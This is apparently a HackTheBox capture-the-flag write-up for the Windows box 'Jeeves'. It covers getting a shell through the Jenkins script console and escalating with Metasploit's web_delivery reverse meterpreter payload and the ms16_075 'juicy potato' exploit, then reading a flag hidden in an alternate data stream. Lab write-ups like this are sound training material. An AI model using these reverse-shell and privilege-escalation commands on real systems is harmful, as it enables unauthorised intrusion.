HTB | Jeeves
This is a Windows box. You can find it here.
Skill Learned
Obtaining shell through Jenkins
Enumerating alternate data streams
NMAP
IP: 10.10.10.63


port 80

Throwing Stack Trace on searching

From this, we know they are using
ASP.NET Version 2.0.5
MS SQL Server 2005
Now Let's look at port 50000
port 50000

Let's do gobuster

We found /askjeeves
On visiting we found that it was Jenkins

Foothold/ shell
On visiting Manage Jenkins > Script Console We can execute Groovy scripts, refer.

Start nc listener and run

We got the shell
We found user.txt

Priv Esc
We have SEImpersonatePrivilege token

Since SeImpersonate is Enabled, that means we can do potato attack, we will be using MSF for that
we will use exploit/multi/script/web_delivery to get a shell on msf via our existing shell
use exploit/multi/script/web_delivery
set srvhost tun0
set lhost tun0
set target PSH
set payload windows/meterpreter/reverse_tcp
run
copy the output of PowerShell cmd to our existing shell and boom we have meterpreter

Now we will use post/multi/recon/local_exploit_suggester to find exploits
found some exploits

Let's use exploit/windows/local/ms16_075_reflection_juicy, set the session and hit run

Boom we are NT AUTHORITY\SYSTEM. But we did not found the root.txt instead there is hm.txt

Let's look deeper
dir /R

We found hm.txt:root.txt:$DATA
more < hm.txt:root.txt:$DATA

and we have root.txt
Always look for Alternative data streams.
Last updated